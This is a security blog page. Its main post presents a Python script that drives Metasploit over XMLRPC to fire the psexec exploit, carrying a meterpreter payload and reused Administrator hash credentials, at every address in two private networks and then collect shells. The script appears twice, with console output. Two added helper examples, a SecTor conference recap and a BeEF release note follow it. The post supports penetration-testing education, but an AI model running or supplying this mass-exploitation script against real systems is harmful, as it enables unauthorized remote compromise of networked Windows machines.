Blog.HappyPacket.net

Security Notes, News, and Thoughts

PSExec Scanner via Metasploit XMLRPC

I was inspired by Jabra's excellent post on creating a PSExec scanner with Metasploit and Perl to demonstrate how this same thing could be done locally or remotely using XMLRPC. The original post by Jabra is also a good way to do this, and can be found here: http://spl0it.wordpress.com/2009/12/17/metasploit-psexec-scanner-via-perl/

Python and its xmlrpclib module make this an easy task. To start, launch Metasploit on the host system and load the xmlrpc plugin:

sussurro@msfdev:~/metasploit$ ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 305 exploits - 67 auxiliary
+ -- --=[ 171 payloads - 20 encoders - 6 nops
=[ svn r7908 updated today (2009.12.17)

msf > load xmlrpc Pass=abc123 ServerType=Web
[*] XMLRPC Service: 127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: abc123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc
msf >
With XMLRPC loaded, we can get down to some Python programming.

As in Jabra's program, the assumption is that we are scanning two networks, 192.168.1.X and 192.168.2.X. The first thing we need to do is authenticate to Metasploit.
import xmlrpclib

user = "msf"
password = "abc123"
token = ""

msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user, password)

if auth["result"] == "success":
    token = auth["token"]
else:
    exit("Login failed, try again\n")

We set up our username, msf, and our super secret password of abc123 first, and then use the xmlrpclib library to connect to our Metasploit server. Once connected, the msf object holds our connection information.

Once connected, the first thing we need to do is authenticate so that we get an authentication token. The token is required for all subsequent calls (unless your session goes idle). We authenticate with the "auth.login" method, and the object we get back contains our token.

Next we need to launch the actual exploit; to keep the calls clear we wrap them in a small function.

def callSploit(ip):
    # Launch the exploit module with the options we would normally set in msfconsole
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST"   : ip,
            "PAYLOAD" : "windows/meterpreter/bind_tcp",
            "SMBUser" : "Administrator",
            "SMBPass" : "LM:NTLM HASH" })
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"

We have defined a function called callSploit which takes an IP address. It calls module.execute on our Metasploit connection, passing our authentication token, the type of module we are calling (exploit) and the module itself. The final argument holds all of the options we would traditionally set inside the Metasploit console. Once we launch the exploit we get back a result object; a result of success means that the request was accepted as valid. While the requests are launching, we can see the sessions popping up in the Metasploit console and can interact with them one at a time.

The next stage in our program is the actual call of our new function:

# range() stops before its upper bound, so (1, 3) covers the .1 and .2 networks
for net in range(1, 3):
    for ip in range(1, 254):
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)

print "DONE.. check for shells"
Here we have just gone through the 192.168.1 and .2 ranges, submitting each valid host address to our callSploit function. The jobs will be running quickly, but if you look inside msfconsole and type "jobs" repeatedly you should see

msf > jobs

Jobs
====

Id  Name
--  ----
2   Exploit: windows/smb/psexec
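To see the whole exchange (login, token, module request, and the rejection a stale token gets) without a live Metasploit instance, here is an added example that is not part of the original post. It is written in Python 3 with xmlrpc.client, the standard-library successor to the xmlrpclib used above, and talks to an in-process stand-in for the xmlrpc plugin that I constructed for the example: it only checks the credentials, issues a token, gates module.execute on it and records the requests, so nothing is executed. The response shapes follow the post; the fault code returned for a bad token and the {"result": "failure"} login response are my assumptions, not Metasploit's documented behaviour.

```python
#!/usr/bin/env python3
"""Round trip of the two RPC calls the post relies on (auth.login and
module.execute) against a constructed, in-process stand-in for Metasploit's
xmlrpc plugin.  Nothing is executed, so the script runs offline."""
import ipaddress
import secrets
import threading
from xmlrpc.client import Fault, ServerProxy
from xmlrpc.server import SimpleXMLRPCServer


class FakeMsfRpc:
    """Stand-in for the plugin's auth.login and module.execute handlers."""

    def __init__(self, username, password):
        self._username = username
        self._password = password
        self._tokens = set()
        self.executed = []  # (module type, module name, options) per request

    def login(self, username, password):
        # As in the post: success returns a token the client must reuse.
        if username == self._username and password == self._password:
            token = secrets.token_hex(16)
            self._tokens.add(token)
            return {"result": "success", "token": token}
        return {"result": "failure"}  # assumed shape for a failed login

    def module_execute(self, token, mtype, mname, opts):
        # Every later call is gated on a token issued by auth.login.
        if token not in self._tokens:
            raise Fault(401, "invalid authentication token")  # assumed code
        self.executed.append((mtype, mname, dict(opts)))
        return {"result": "success", "job_id": len(self.executed)}


def start_fake_server(username, password):
    """Serve the stand-in on an ephemeral loopback port (like the plugin's
    127.0.0.1:55553 default shown above); return (url, backend, server)."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    backend = FakeMsfRpc(username, password)
    # Dotted names so the client can call msf.auth.login / msf.module.execute.
    server.register_function(backend.login, "auth.login")
    server.register_function(backend.module_execute, "module.execute")
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    return "http://%s:%d/RPC2" % (host, port), backend, server


def hosts_in(networks):
    """Usable host addresses of the given CIDR networks, as strings.
    ip_network(...).hosts() yields .1 through .254 of a /24, which the
    post's range(1, 254) loop misses by one."""
    return [str(h) for cidr in networks for h in ipaddress.ip_network(cidr).hosts()]


def run_scan(url, user, password, module, base_opts, targets):
    """Log in once, then submit one module.execute per target.
    Returns {target: "success" | "fault:<message>"}."""
    msf = ServerProxy(url)
    auth = msf.auth.login(user, password)
    if auth["result"] != "success":
        raise RuntimeError("login failed, check the password given to 'load xmlrpc'")
    token = auth["token"]
    results = {}
    for ip in targets:
        opts = dict(base_opts, RHOST=ip)  # RHOST is the only per-target option
        try:
            ret = msf.module.execute(token, "exploit", module, opts)
            results[ip] = ret["result"]
        except Fault as err:
            results[ip] = "fault:" + err.faultString
    return results


def rejected_without_token(url, module):
    """Edge case: module.execute with a stale or made-up token is refused."""
    msf = ServerProxy(url)
    try:
        msf.module.execute("not-a-real-token", "exploit", module, {})
    except Fault as err:
        return err.faultCode
    return None


if __name__ == "__main__":
    url, backend, server = start_fake_server("msf", "abc123")
    targets = hosts_in(["192.168.1.0/30"])  # just .1 and .2 for the demo
    opts = {"PAYLOAD": "windows/meterpreter/bind_tcp",
            "SMBUser": "Administrator", "SMBPass": "LM:NTLM HASH"}
    print(run_scan(url, "msf", "abc123", "windows/smb/psexec", opts, targets))
    print("requests recorded by the stand-in:", len(backend.executed))
    print("fault code for a bad token:", rejected_without_token(url, "windows/smb/psexec"))
    server.shutdown()
```

Two things worth noting from running it: the password handed to `load xmlrpc` is the only gate on the interface, so the plugin's loopback-only default seen in the console output above is what keeps it local, and a client that loses its token (idle session, restarted msfconsole) gets an XML-RPC fault rather than a `{"result": ...}` dictionary, so `module.execute` calls should be wrapped as `run_scan` does instead of indexing the result blindly.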

Finally, for each host where the credentials work, you will hopefully see a session open:

[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
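The "check for shells" step is easier to report on if the console lines above are turned into a per-target inventory. The following is an added example, not code from the original post: it parses the "Meterpreter session N opened (...)" lines, reconciles them with the target list the loop was fed, and flags any host that opened a session but was not on that list. The sample console text is constructed from the output above; the regular expression matches the line format shown there (with the post's bind_tcp payload the right-hand address is the target).

```python
#!/usr/bin/env python3
"""Turn msfconsole 'Meterpreter session N opened' lines into a report of
which scanned targets yielded a session.  Constructed example data."""
import re
from collections import defaultdict

# Matches the format shown in the post: session id, then (local -> remote).
SESSION_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)"
)

# Constructed sample: the three session lines from the post plus unrelated
# console noise that the parser must ignore.
SAMPLE_CONSOLE = """\
msf > jobs
[*] Meterpreter session 4 opened (192.168.1.5:36435 -> 192.168.1.44:4444)
[*] Meterpreter session 5 opened (192.168.1.5:43357 -> 192.168.1.130:4444)
[*] Meterpreter session 6 opened (192.168.1.5:48619 -> 192.168.2.3:4444)
msf >
"""


def parse_session_lines(text):
    """One dict per session line; lines that do not match are skipped."""
    sessions = []
    for line in text.splitlines():
        m = SESSION_RE.search(line)
        if not m:
            continue
        d = m.groupdict()
        sessions.append({"sid": int(d["sid"]),
                         "lhost": d["lhost"], "lport": int(d["lport"]),
                         "rhost": d["rhost"], "rport": int(d["rport"])})
    return sessions


def summarize(sessions, targets):
    """Map every scanned target to its session ids (empty list = no shell).
    Hosts with a session that were not in the target list come back
    separately, since they point at a mismatch between the scan list and
    what actually opened."""
    by_host = defaultdict(list)
    for s in sessions:
        by_host[s["rhost"]].append(s["sid"])
    report = {t: by_host.get(t, []) for t in targets}
    unexpected = {h: sids for h, sids in by_host.items() if h not in targets}
    return report, unexpected


if __name__ == "__main__":
    found = parse_session_lines(SAMPLE_CONSOLE)
    scanned = ["192.168.1.44", "192.168.1.45", "192.168.2.3"]  # constructed list
    report, unexpected = summarize(found, scanned)
    for host, sids in report.items():
        print(host, "sessions:", sids or "none")
    print("not in target list:", unexpected)
```

Feed it the saved console output (or the `sessions -l` listing, if you adapt the regular expression to that table) together with the same target list the scan loop used, and the report shows at a glance which hosts accepted the credentials and which did not.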


To get Metasploit, go over to http://www.metasploit.com
Jabra's blog is a great read: http://spl0it.wordpress.com

Here is the script in easier copy and paste form:

#!/usr/bin/python

import xmlrpclib
import time

user = "msf"
password = "abc123"
token = ""

# Connect to the xmlrpc plugin loaded in msfconsole and fetch a token
msf = xmlrpclib.ServerProxy("http://localhost:55553/RPC2")
auth = msf.auth.login(user, password)

if auth["result"] == "success":
    token = auth["token"]
else:
    exit("Login failed, try again\n")

def callSploit(ip):
    # Launch the exploit module with the options we would normally set in msfconsole
    ret = msf.module.execute(token, "exploit", "windows/smb/psexec",
        {
            "RHOST"   : ip,
            "PAYLOAD" : "windows/meterpreter/bind_tcp",
            "SMBUser" : "Administrator",
            "SMBPass" : "LM:NTLM HASH" })
    if ret["result"] != "success":
        print "Exploit failed for " + ip + "\n"

# range() stops before its upper bound, so (1, 3) covers the .1 and .2 networks
for net in range(1, 3):
    for ip in range(1, 254):
        callSploit("192.168." + str(net) + "." + str(ip))
        time.sleep(1)

print "DONE.. check for shells"


Thoughts on SecTor

Last week I had the opportunity to speak at SecTor: Canada's Premier IT Security Conference. I had heard positive feedback regarding the conference from previous years and as the conference is only in its 3rd year the number of attendees was impressive. I have attended a number of other conferences in the past year including ShmooCon, BlackHat and Defcon and I thought that the organization of this conference was impressive. For being a new conference I thought that SecTor had a great lineup of speakers, quality vendors, and some great keynotes.

From a speaker's perspective, my first communications with the SecTor team came during the Call For Papers (CFP) stage. Brian Bourne, the primary face of SecTor, was very responsive through this process and once I had been notified that I had been accepted to speak the rest of the planning started. Nanna Ng initiated the trip planning process and guided me through all the steps needed to get plane and hotel reservations handled. SecTor takes excellent care of their speakers. I was amazed at the extent they went to in order to make my trip painless.

SecTor had handled the booking for both airlines and hotel, so once I had all my presentation materials in, all I had to do was show up at the airport. After landing in Toronto there was a car waiting for me to take me to the hotel, where I was checked in without incident. The accommodations at the InterContinental hotel were great and it was attached to the conference center so it was just a short walk from the hotel room to the conference area. The SecTor team had worked to make sure that the travel was painless and the experience that they created for the speakers was amazing.

The conference itself started on Tuesday although there was some training on Monday. After some opening remarks by Brian, Chris Hoff delivered a great keynote on Cloud Computing. Chris is a great speaker and brought forth a ton of information on "the cloud" in an easy to understand way and really made all of the information mesh.

Following the keynotes the sessions started. The first session I attended was "When Web 2.0 Attacks - Understanding AJAX, Flash and 'Highly Interactive Technology'" by Rafal Los. Rafal is a great speaker and had some good information on some of the vulnerabilities that Web 2.0 presents when implemented poorly and had some great points on how many of the old vulnerabilities that we thought had been dealt with are re-emerging in Web 2.0. I really enjoyed this talk.

Andrew Nash from PayPal delivered a lunch keynote. While this was my least favorite keynote, there was good information on identity management. Mr Nash is a good speaker, unfortunately I am not sure that it was as relevant to as many people at the conference. I thought it was interesting to hear some of what PayPal was doing, but there was no real link into how anyone else can leverage the resources or how the information pertained to us aside from that PayPal is working hard to protect our information.

The afternoon sessions were great. After lunch I headed over to see Jennifer Jabbusch's talk "Retaliation: Breaking Attack Vectors in the Infrastructure". She did a great job of explaining emerging threats on the network and what the latest standards are doing to help protect layers 2 and 3 in the network.

The next talk that I went to was by Robert Hansen (RSnake) on "Consumerization and Future State of Information Warfare". Robert focused on where information warfare is heading and how the technology used by attackers has grown to the point where we are likely to see automated identities formed soon, where automated applications role-play a part in order to bring people into their social media circle, where the typical spam and malware will be distributed sparingly between meaningful information. Overall a really informative talk, although the findings of his research were a little disheartening as it is obvious that the attackers are moving quickly and are very agile.

That evening was a reception and speakers dinner at Joe Badalis. I thought that this was hugely successful. I met some great people and had a chance to talk with both attendees and other speakers and it was overall a great time. The dinner that followed the reception was great and I had some awesome discussions with the other folks at the table. This was a great experience and I hope they keep this for future years.

There was no keynote on Wednesday morning and we instead went directly into talks. I attended Andrés Riancho's two talks on the w3af framework. These talks took up the whole morning but the time was well spent. I learned much more about the w3af framework and where it is headed.
Andrés gave great demos and examples of everything from how to do a scan to how to write your own module. He even included some information about how w3af handles web scanning compared to other vendors. Andrés offers w3af training in case anyone is interested, so check it out if you want to know more about the w3af framework.

The lunch keynote was by Adam Laurie known as Major Malfunction. The title was "A day in the life of a hacker.." and covered some great stuff on hardware hacking. He was very engaging as a speaker and even included technical examples during the keynote which seems to be very rare. He went in-depth into how the biometric passports work and exposed some of the scarier sides of the technology that you don't normally get to see.

The rest of the day I was presenting. My first talk on Nsploit went ok, although it wasn't an overwhelming success. I'm not sure if it was the post lunch coma, if the talk was too technical, or if it was just boring but I didn't get a lot of interaction during the talk. I did get a lot of good questions after the talk though so that was nice. The second talk on BeEF seemed to go well with great interaction, some awesome questions, and people seemed to be much more into it. Overall it was a good experience but I may need to tweak the Nsploit talk if I do it again.

The conference finished with some closing remarks from Brian again. The vendor drawings were held and folks got their toys, and then a few of us went out for Mexican across the street for some more networking. Overall I got to meet some great people, hear some awesome talks, and had a great experience thanks to the organizers of SecTor. I hope that I get to attend next year, whether as a presenter again or as an attendee I know that I will enjoy it.

Thanks again to all the organizers of SecTor for making the trip memorable in a positive way. Hope to see everyone again next year.

BeEF injection with Metasploit Payloads

Wade Alcorn has released the latest version of the Browser Exploitation Framework, or BeEF for short. This version has some new features in it, including the code that I worked on for the Security BSides presentation. I encourage you to go over to http://www.bindshell.net and download the latest version of BeEF and try it out. If you don't know how to get started, download the Samurai WTF distribution at http://samurai.inguardians.com and then head over to http://www.ethicalhacker.net where I have done some videos on how to upgrade to the latest version of BeEF and also demonstrated two of the new features. In addition to some of the features I added, Jabra and RSnake also have new code in this release. The vimeo videos are linked on http://www.ethicalhacker.net as well.

I'm going to be updating my blog more frequently, but feel free to follow me on Twitter as @sussurro and I'll be posting updates there as well.

Thanks again to Wade Alcorn for incorporating and also cleaning up my code for the distribution, he has been great to work with. Thanks also go to H D Moore of the Metasploit project for incorporating my Metasploit changes which allow all this to work.